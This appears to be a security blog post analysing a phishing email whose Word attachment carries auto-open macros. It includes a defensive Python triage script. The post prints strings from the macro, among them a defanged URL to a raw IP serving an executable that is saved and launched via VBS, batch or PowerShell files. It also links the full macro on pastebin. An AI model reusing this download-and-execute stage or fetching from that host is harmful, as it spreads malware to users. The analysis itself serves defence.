“X-Gm-Spam: 1” and “X-Gm-Phishy: 1” tell me that the Gmail spam filters (formerly known as Postini) think this is spam and possibly a phishing attempt, but they let it through anyway. Thanks Gmail.

“abts-mum-static-132.109.170.122.airtelbroadband.in” is a static IP address of a broadband service, probably in or at least near Mumbai, India. Static addresses usually go to business customers, so this probably belongs to a small company. According to http://en.wikipedia.org/wiki/Bharti_Airtel, Airtel runs a cellular network, fixed line broadband to homes, and provides TV service – so, basically, India’s version of Verizon.

It wasn’t the email or the headers that got my attention, though. It was the attachment. It’s been a while since I’ve seen an attempt to use a Word Document to spread malware. Very late-90’s of them.

Stepping over to the “Additional Information” tab, we see some interesting lines.

“File type: Office Open XML Document” – but this file was a .doc, not a .docx.

“File names:” – the file has been uploaded several times under different names. All the names follow the same two letters, seven digits, two letters ([A-Z]{2}[0-9]{7}[A-Z]{2}\.doc) format, which indicates programmatically generated names and no imagination.

“Company: SPecialiST RePack” – created with a pirated copy of Word. A Google search of those two words led me to this Russian pirate website: http:// www . 5peciali5t . tk

“Creator: MMM” – the user name supplied by whoever installed this pirated copy of Word.

“CreateDate: 2014:10:18 09:14:00Z” – this shows when Word created the new document. This is when the “new” button is pressed, which usually occurs before typing and pressing the save button.

“ModifyDate: 2014:10:22 12:53:00Z” – this shows when Word last hit the save button. That is about two days’ worth of work on the part of this attacker, though it could be longer if the macro was cut-n-pasted from elsewhere. What is interesting here is how quickly this went from saved to sent (1pm to 3pm).

On to the file itself. Since it is really a docx and since those are really zipped XML, our first step is unzipping it.

doc/word/document.xml – the actual document. It just says “You didn’t enable macros.” And then has a picture to show you how. How convenient.

doc/word/media/image1.gif – the embedded image

doc/word/vbaData.xml – the part of the word doc that says how to handle the macro. The interesting part here is that there are actually four embedded macros:

ThisDocument.Auto_Open

ThisDocument.h

ThisDocument.Workbook_Open

ThisDocument.AutoOpen

This shows that the code was written to work in either Word or Excel: AutoOpen is the only one of these names that has meaning in Word, whereas Auto_Open is the one that would fire in Excel. Workbook_Open is also Excel specific and slightly redundant; the difference between it and Auto_Open is slight and has to do with when each event is fired.
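The checks above (ZIP container despite the .doc extension, the generated filename pattern, and the auto-executing macro names in word/vbaData.xml) can be scripted for triage. This is an added example, not code from the post; the sample document it builds is constructed in memory, and the wne:mcd layout it mimics is an assumption, which is why the parser simply harvests every ThisDocument.<name> reference rather than relying on the exact element structure.

```python
import io
import re
import zipfile

# Macro names that run as soon as macros are enabled: Word fires AutoOpen,
# Excel fires Auto_Open and Workbook_Open (the others are common variants).
AUTO_EXEC = {"AutoOpen", "Auto_Open", "Workbook_Open", "Document_Open", "AutoExec"}

# Filename shape seen on VirusTotal: two letters, seven digits, two letters.
NAME_RE = re.compile(r"^[A-Z]{2}[0-9]{7}[A-Z]{2}\.doc$")

def triage(data: bytes, filename: str) -> dict:
    """Return what a responder wants to know before ever opening the file."""
    result = {
        # ZIP magic means Office Open XML, whatever the extension claims.
        "is_ooxml": data[:4] == b"PK\x03\x04",
        "extension_mismatch": False,
        "generated_name": bool(NAME_RE.match(filename)),
        "has_vba": False,
        "macros": [],
        "auto_exec": [],
    }
    if not result["is_ooxml"]:
        return result
    result["extension_mismatch"] = filename.lower().endswith(".doc")
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        result["has_vba"] = "word/vbaProject.bin" in names
        if "word/vbaData.xml" in names:
            xml = z.read("word/vbaData.xml").decode("utf-8", "replace")
            # Harvest every ThisDocument.<procedure> reference, layout-agnostic.
            found = sorted(set(re.findall(r"ThisDocument\.(\w+)", xml)))
            result["macros"] = found
            result["auto_exec"] = [m for m in found if m in AUTO_EXEC]
    return result

def build_sample() -> bytes:
    """Constructed stand-in for the post's document (not the real sample)."""
    mcds = "".join(f'<wne:mcd wne:name="Project.ThisDocument.{m}"/>'
                   for m in ("Auto_Open", "h", "Workbook_Open", "AutoOpen"))
    vba_data = ('<wne:vbaSuppData xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">'
                f"<wne:mcds>{mcds}</wne:mcds></wne:vbaSuppData>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaData.xml", vba_data)
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder OLE blob")
    return buf.getvalue()
```

Running triage(build_sample(), "AB1234567CD.doc") flags the extension mismatch, the generated name, the presence of vbaProject.bin and the three auto-executing entry points, which is enough to quarantine without ever opening the file in Word.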

doc/word/vbaProject.bin – this is the actual macro. I don’t really want to spend a lot of time doing code analysis here, but I will show you some interesting strings pulled from the file. The rest of the file was uploaded to pastebin here http://pastebin.com/NUGPQAFs

$url = 'http:// 162.243.234.167:8080 / gr / 4.exe';
$file = 'crsss2.exe';
$someFilePath = $ScriptDir + 'crsss2.exe';
$vbsFilePath = $ScriptDir + 'ntuserskk.vbs';
$batFilePath = $ScriptDir + 'ntusersss.bat';
$psFilePath = $ScriptDir + 'ntusersc.ps1';
exe /c crsss2.exe;

So, basically, the code downloads “crsss2.exe” and then tries to execute it via either a Visual Basic script, a batch file, or a PowerShell script. The IP “162.243.234.167” belongs to a Great Lakes Dermatology in New York.

The “File Detail” tab at VirusTotal contained some fields that I thought might be interesting, but they were coming back garbled. VirusTotal gets that data from a great tool that I love called ExifTool. So, I ran ExifTool locally, and it turned out the text was garbled because it was in Cyrillic.